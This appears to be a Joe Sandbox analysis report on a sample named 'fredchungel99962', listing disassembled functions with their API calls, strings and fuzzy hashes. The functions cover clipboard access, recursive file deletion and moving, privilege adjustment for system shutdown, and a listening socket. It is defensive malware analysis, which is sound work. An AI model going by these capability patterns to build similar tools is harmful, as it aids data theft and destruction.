Instruction ID: a8af549eb1ca104de391fce6e2391a26578157d15274eab2ae4ec8c08be72024
Opcode Fuzzy Hash: bb756234144032afdae0bfd0da9d1a969488ff8b0e38b48d2923547ad4181347
Instruction Fuzzy Hash: 14715DB590120AABEF28DFA8DC44BEEBBBCBF05314F044515FA15AA184DB71A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0132EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0134CC08), ref: 0132EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0132EB37
GetClipboardData.USER32 ref: 0132EB43
CloseClipboard.USER32 ref: 0132EB4F
GlobalLock.KERNEL32 ref: 0132EB87
CloseClipboard.USER32 ref: 0132EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0132EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0132EBC9
GetClipboardData.USER32 ref: 0132EBD1
GlobalLock.KERNEL32 ref: 0132EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0132EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0132EC38
GetClipboardData.USER32 ref: 0132EC44
GlobalLock.KERNEL32 ref: 0132EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0132EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0132EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0132ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0132ECF3
CountClipboardFormats.USER32 ref: 0132ED14
CloseClipboard.USER32 ref: 0132ED59

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 1e01f37aa52dcc5714c784f09b728d658eb4cd056f42b56b5037d7c24b47333a
Instruction ID: 3f87f34a319fb63e2a8357549ac4895e1be09490ea13093e6295668b9a9f97fd
Opcode Fuzzy Hash: 1e01f37aa52dcc5714c784f09b728d658eb4cd056f42b56b5037d7c24b47333a
Instruction Fuzzy Hash: 2A6103382043029FD710EF28C895F7A7BA8EF84758F08542DF55697291CF31E945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0132698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 013269BE
FindClose.KERNEL32(00000000), ref: 01326A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01326A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01326A75

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 01326AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 01326ADF

Strings

%4d, xrefs: 01326BB1
%4d%02d%02d%02d%02d%02d, xrefs: 01326B6A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 01326B32
%02d, xrefs: 01326C00, 01326C0A, 01326C5A, 01326CAA, 01326CFA, 01326D4A
%03d, xrefs: 01326DA2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 465c3e011e8b761843637d3fd969343cd8bfaac75d40aa2f8b9903cb5f94c3e6
Instruction ID: d200c64fb14789ba840745657cfd1fea74924c78802d9ceda8e5576402b6b04f
Opcode Fuzzy Hash: 465c3e011e8b761843637d3fd969343cd8bfaac75d40aa2f8b9903cb5f94c3e6
Instruction Fuzzy Hash: 8CD172B1518301AFC710EBA5C991EBBB7ECAF98704F44491DF689C7190EB74DA44CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01329642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 01329663
GetFileAttributesW.KERNEL32(?), ref: 013296A1
SetFileAttributesW.KERNEL32(?,?), ref: 013296BB
FindNextFileW.KERNEL32(00000000,?), ref: 013296D3
FindClose.KERNEL32(00000000), ref: 013296DE
FindFirstFileW.KERNEL32(*.*,?), ref: 013296FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0132974A
SetCurrentDirectoryW.KERNEL32(01376B7C), ref: 01329768
FindNextFileW.KERNEL32(00000000,00000010), ref: 01329772
FindClose.KERNEL32(00000000), ref: 0132977F
FindClose.KERNEL32(00000000), ref: 0132978F

Strings

*.*, xrefs: 013296F5

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 1dd200c33c46c5dd4341f8f3647cf356d6d5f72b698cbee3fdcd6f6549d53b38
Instruction ID: 5c16a7ae6f1ca240c2d88a841905726bc4ca4695e090e30a659318cd731063cf
Opcode Fuzzy Hash: 1dd200c33c46c5dd4341f8f3647cf356d6d5f72b698cbee3fdcd6f6549d53b38
Instruction Fuzzy Hash: B631D63650123A6BEF20AEB9DC08BEE77BCAF09228F00415AF905E2190DB74DA44CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0132979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 013297BE
FindNextFileW.KERNEL32(00000000,?), ref: 01329819
FindClose.KERNEL32(00000000), ref: 01329824
FindFirstFileW.KERNEL32(*.*,?), ref: 01329840
SetCurrentDirectoryW.KERNEL32(?), ref: 01329890
SetCurrentDirectoryW.KERNEL32(01376B7C), ref: 013298AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 013298B8
FindClose.KERNEL32(00000000), ref: 013298C5
FindClose.KERNEL32(00000000), ref: 013298D5

Part of subcall function 0131DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0131DB00

Strings

*.*, xrefs: 0132983B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: ff0a99864e4ff2812e54251b66d777c2f976901b2c2c277cf9889852915bfcb0
Instruction ID: acef9f7d5c98c5488708ca81b226890362b5f3d3c0dd7fce2741830a3fffb5c0
Opcode Fuzzy Hash: ff0a99864e4ff2812e54251b66d777c2f976901b2c2c277cf9889852915bfcb0
Instruction Fuzzy Hash: 78310A31501239AFEF24FEB9DC48BEE3BBC9F0522CF144159E554A2190DBB0DA44CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0131D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 012B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,012B3A97,?,?,012B2E7F,?,?,?,00000000), ref: 012B3AC2

Part of subcall function 0131E199: GetFileAttributesW.KERNEL32(?,0131CF95), ref: 0131E19A

FindFirstFileW.KERNEL32(?,?), ref: 0131D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0131D1DD
MoveFileW.KERNEL32 ref: 0131D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0131D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0131D237

Part of subcall function 0131D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 0131D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0131D253
FindClose.KERNEL32(00000000), ref: 0131D264

Strings

\*.*, xrefs: 0131D0CD, 0131D0D6, 0131D0EB

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 024a861cac04ae12e6fd2a38b15a5327cfa03ffe07cd43f5c4731cd149a54a49
Instruction ID: 04ff919d8fb85f2ee8d7dd04aec26cf7d0cd4299dca669dc0cfd43de57805984
Opcode Fuzzy Hash: 024a861cac04ae12e6fd2a38b15a5327cfa03ffe07cd43f5c4731cd149a54a49
Instruction Fuzzy Hash: 81619D7180110EABCF19EBE8C9959FDBB79AF25348F204165E50277194EF30AF4ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 0132ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0132ED91
EmptyClipboard.USER32 ref: 0132ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0132EDAC
CloseClipboard.USER32 ref: 0132EEA3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 7e10c0f3bbce969e6a404e710180ecc8fc868c9240b132ae009e15d4ee9c8fd2
Instruction ID: 3129bd4ff1b2c91a9bf75ee2f1956b12aece40dab52bfc9765264bed3169c74a
Opcode Fuzzy Hash: 7e10c0f3bbce969e6a404e710180ecc8fc868c9240b132ae009e15d4ee9c8fd2
Instruction Fuzzy Hash: D04191352056219FE721EF19D489B69BBE8FF44328F14C0A9E4198B762CB75FC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0131E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 013116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0131170D
Part of subcall function 013116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0131173A
Part of subcall function 013116C3: GetLastError.KERNEL32 ref: 0131174A

ExitWindowsEx.USER32(?,00000000), ref: 0131E932

Strings

, xrefs: 0131E920
, xrefs: 0131E95C
SeShutdownPrivilege, xrefs: 0131E902
@, xrefs: 0131E925

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 5fa9fa3dfbe0585d741e347e5f5319442826ff49292348cb6c5c832dc6085371
Instruction ID: 30293f8f13ff1c9f3b84bb8d1cf7bc612f0cd2be69702a116ed4afe280aee107
Opcode Fuzzy Hash: 5fa9fa3dfbe0585d741e347e5f5319442826ff49292348cb6c5c832dc6085371
Instruction Fuzzy Hash: 41014972A10315ABFB6D22BD9C85FFF725DAB1875CF040832FD13E21C5D9AA5C4082A0

Uniqueness

Uniqueness Score: -1.00%

Function 01331204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01331276
WSAGetLastError.WSOCK32 ref: 01331283
bind.WSOCK32(00000000,?,00000010), ref: 013312BA
WSAGetLastError.WSOCK32 ref: 013312C5
closesocket.WSOCK32(00000000), ref: 013312F4
listen.WSOCK32(00000000,00000005), ref: 01331303
WSAGetLastError.WSOCK32 ref: 0133130D
closesocket.WSOCK32(00000000), ref: 0133133C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 91190e2e34cf70717f57ce8ed439c730a7c788222fed776f3575ecf450e74e82
Instruction ID: d7dadd6f19c9a85570f7ce24b742d16d7fb20c735a00e2488523db955d22b504
Opcode Fuzzy Hash: 91190e2e34cf70717f57ce8ed439c730a7c788222fed776f3575ecf450e74e82
Instruction Fuzzy Hash: 424195756001019FE720DF68D484B69BBE5BF86328F188198D9569F2D6C771EC81CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 012C997D Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 012C9A4E
GetSysColor.USER32 ref: 012C9B23
SetBkColor.GDI32(?,00000000), ref: 012C9B36

Strings

6ofs, xrefs: 0130778D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Color$LongProcWindow
String ID: 6ofs
API String ID: 3131106179-1294211291
Opcode ID: 2232095721b027aaca4dc6e9c02c364fe3a5881c47d7efe9df6f734176a47674
Instruction ID: f6ea55a5281a7596e5d2ff4f8e69dc53d53b73579ccf6b08f5ecbcfed41539c7
Opcode Fuzzy Hash: 2232095721b027aaca4dc6e9c02c364fe3a5881c47d7efe9df6f734176a47674
Instruction Fuzzy Hash: 06A11571224145BEEF369A2C8C59EBB3ADDEB46B5CF04030DF742D66C4CA65A981C372

Uniqueness

Uniqueness Score: -1.00%

Function 012EB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 012EB9D4
_free.LIBCMT ref: 012EB9F8
_free.LIBCMT ref: 012EBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01353700), ref: 012EBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0138121C,000000FF,00000000,0000003F,00000000,?,?), ref: 012EBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,01381270,000000FF,?,0000003F,00000000,?), ref: 012EBC36
_free.LIBCMT ref: 012EBD4B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 65cebeefc31d11d6035986da2b876b36ba4c212a017f7f78e14f2830c8f49d47
Instruction ID: f3ad29003cebeea1abce3a33c519e24d6bc4fa85fe94d783f210a3776cb36946
Opcode Fuzzy Hash: 65cebeefc31d11d6035986da2b876b36ba4c212a017f7f78e14f2830c8f49d47
Instruction Fuzzy Hash: 15C12771924206AFDF21DF78C849ABE7BF9EF41310F94419ADA94D7245EB309A41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0131D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 012B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,012B3A97,?,?,012B2E7F,?,?,?,00000000), ref: 012B3AC2

Part of subcall function 0131E199: GetFileAttributesW.KERNEL32(?,0131CF95), ref: 0131E19A

FindFirstFileW.KERNEL32(?,?), ref: 0131D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0131D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0131D481
FindClose.KERNEL32(00000000), ref: 0131D498
FindClose.KERNEL32(00000000), ref: 0131D4A1

Strings

\*.*, xrefs: 0131D3F2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: c1929d8ae01ac1843e3b22e84821faa82075cf7cda879d76ba0dd5316c84bbe5
Instruction ID: d48d24978061f1e898c6af52747dfaf7706684def2e1588b13333655ec7719ed
Opcode Fuzzy Hash: c1929d8ae01ac1843e3b22e84821faa82075cf7cda879d76ba0dd5316c84bbe5
Instruction Fuzzy Hash: BA31A271019346ABC715EF68D8948FF77A8BEA2344F444A1DF4D553190EF20AA09C762

Uniqueness

Uniqueness Score: -1.00%

Function 012EE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 012EE645

Strings

1#SNAN, xrefs: 012EF844
1#INF, xrefs: 012EF852
1#QNAN, xrefs: 012EF84B
1#IND, xrefs: 012EF83D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: df9a744107968025c9c4a874e7c86c59ed8b185e8e9c823dac1a62578801351d
Instruction ID: 7d26a17b4f916f313fbb2ff33f8d94b009f03224d2ba3cc153e78d6649a607ac
Opcode Fuzzy Hash: df9a744107968025c9c4a874e7c86c59ed8b185e8e9c823dac1a62578801351d
Instruction Fuzzy Hash: D1C25B72E246298FDB25CE28DD487EAB7F5EB48304F5541EAD90DE7240E774AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 0132648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 013264DC
CoInitialize.OLE32(00000000), ref: 01326639
CoCreateInstance.OLE32(0134FCF8,00000000,00000001,0134FB68,?), ref: 01326650
CoUninitialize.OLE32 ref: 013268D4

Strings

.lnk, xrefs: 013264BA, 01326524, 013265E0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: f56f250ec2d09276e53106f74b9810e3004237f67633034510e926d24f197fa9
Instruction ID: 9888059dd9be82aa56e1bc070118289751b6f7e444b35d32f6b9f3ee53b1cf2c
Opcode Fuzzy Hash: f56f250ec2d09276e53106f74b9810e3004237f67633034510e926d24f197fa9
Instruction Fuzzy Hash: DFD16BB15183019FD314EF24C8C19ABB7E8FF98748F10495DF5958B2A1EB70E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01329B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 01329B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 01329C8B

Part of subcall function 01323874: GetInputState.USER32 ref: 013238CB
Part of subcall function 01323874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01323966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 01329BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 01329C75

Strings

*.*, xrefs: 01329B5D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: d51e0a572ef53f9a7168317e99e550db9d0ae831d3996fb5021d098c09103353
Instruction ID: d5b3bff81a979e56a2ad5c98df294695750a0db334454126f4e4c1cf21228e8a
Opcode Fuzzy Hash: d51e0a572ef53f9a7168317e99e550db9d0ae831d3996fb5021d098c09103353
Instruction Fuzzy Hash: FB41837190522AAFDF15EF68C884BEE7BB8FF15358F144059E505A3290EB309A84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 012B8060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON

Download Yara Rule

Strings

91ZABQXgvBvBou3vbt, xrefs: 012F5D04
VUUU, xrefs: 012B83E8
VUUU, xrefs: 012B83FA
VUUU, xrefs: 012B843C
VUUU, xrefs: 012F5DF0
ERCP, xrefs: 012B813C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: 91ZABQXgvBvBou3vbt$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-3052736699
